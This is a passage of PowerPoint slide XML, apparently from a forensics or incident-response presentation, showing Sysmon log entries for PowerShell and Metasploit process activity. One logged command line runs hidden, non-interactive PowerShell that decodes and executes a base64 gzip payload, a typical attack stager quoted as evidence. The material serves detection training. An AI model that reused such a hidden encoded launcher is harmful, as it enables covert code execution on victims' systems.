+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>CurrentDirectory</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: C:\WINDOWS</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>User: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>PC2\user</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IntegrityLevel</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: High</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Hashes: SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ParentImage</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ParentCommandLine</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: ""</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>powershell.exe</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>"" -noni -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>nop</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> -w </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>hidden</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> -c &amp;([</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>scriptblock</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]::create((New-Object </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.StreamReader</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(New-Object </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.Compression.GzipStream</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>((New-Object </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.MemoryStream</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(,[Convert]::FromBase64String('H4sIAFuWmlwCA7VW/W+iSBj+uU36P5CNiZBaRWu7vSabHCAornRlUbR65kJhhFkHcGGo4t7+7/eOQLebbe92LzlCwny8n8/7zLyss8ilOI44/5r7cnZ6MnYSJ+T42mZ+3eBqIRZOTmC1Fut2yr3j+KW03fbi0MHR6vZWyZIERbSYN/uISmmKwgeCUcoL3F/cLEAJuvjw8Am5lPvC1f5s9kn84JBSLFccN0DchRR5bG8Uuw6LpGltCaZ8/+VTc79RPrZ2Kh7tN+/aUbV0e7uAIOHA7m6aIxT5NGiI+0tRhN4i7rsi5PjzaSnxNufBUIN1pgKWwjA5GhbY+a2lgTf/P8Eq74wAPt6/gvVt7R92fwpAsVEm/MP69wu/BOgvpj5zMAU5C649gorW+woCJTOe/Z2wskDl1+XDfi8/ZPTiDn5azk7/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>BrreYUTFCgAA</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>'))),[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.Compression.CompressionMode</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]::Decompress))).</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ReadToEnd</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>()))";"1";"5";;"4";"1";"0";"-9223372036854775808";"589779";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:44";;;"Microsoft-Windows-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Sysmon</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ProcessCreate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>System.String</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]";"System.Collections.Generic.List`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]"</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Nadpis 10">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766BAAD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="142301"/>
+            <a:ext cx="12192000" cy="585926"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="5400" dirty="0"/>
+              <a:t>POWERSHELL PROCESS</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="704521522"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="Obdélník 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1498473" y="1736229"/>
+            <a:ext cx="10515600" cy="3385542"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>"File creation time changed:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>RuleName</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>UtcTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 2019-03-26 21:14:43.489</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ProcessGuid</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: {9CA6D9DA-9643-5C9A-0000-001029551801}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ProcessId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 5620</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
+              <a:t>powershell.exe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>TargetFilename</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
+              <a:t>GPTP47LXLWQ9XHJFBNUM.temp</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>CreationUtcTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 2019-02-18 07:25:45.895</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>PreviousCreationUtcTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 2019-03-26 21:14:43.489";"2";"4";;"4";"2";"0";"-9223372036854775808";"589777";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:43";;;"Microsoft-Windows-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>Sysmon</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"File creation time changed (rule: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>FileCreateTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>System.String</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>]";"System.Collections.Generic.List`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>]"</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Nadpis 10">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766BAAD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="64008" y="201169"/>
+            <a:ext cx="12192000" cy="585926"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="5400" dirty="0"/>
+              <a:t>METASPLOIT PROCESS</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3419150997"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="Obdélník 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1516761" y="1834651"/>
+            <a:ext cx="10515600" cy="3600986"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>CurrentDirectory</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: C:\WINDOWS\system32\</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>User: PC2\user</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>LogonGuid</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: {9CA6D9DA-818F-5C9A-0000-002032380300}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
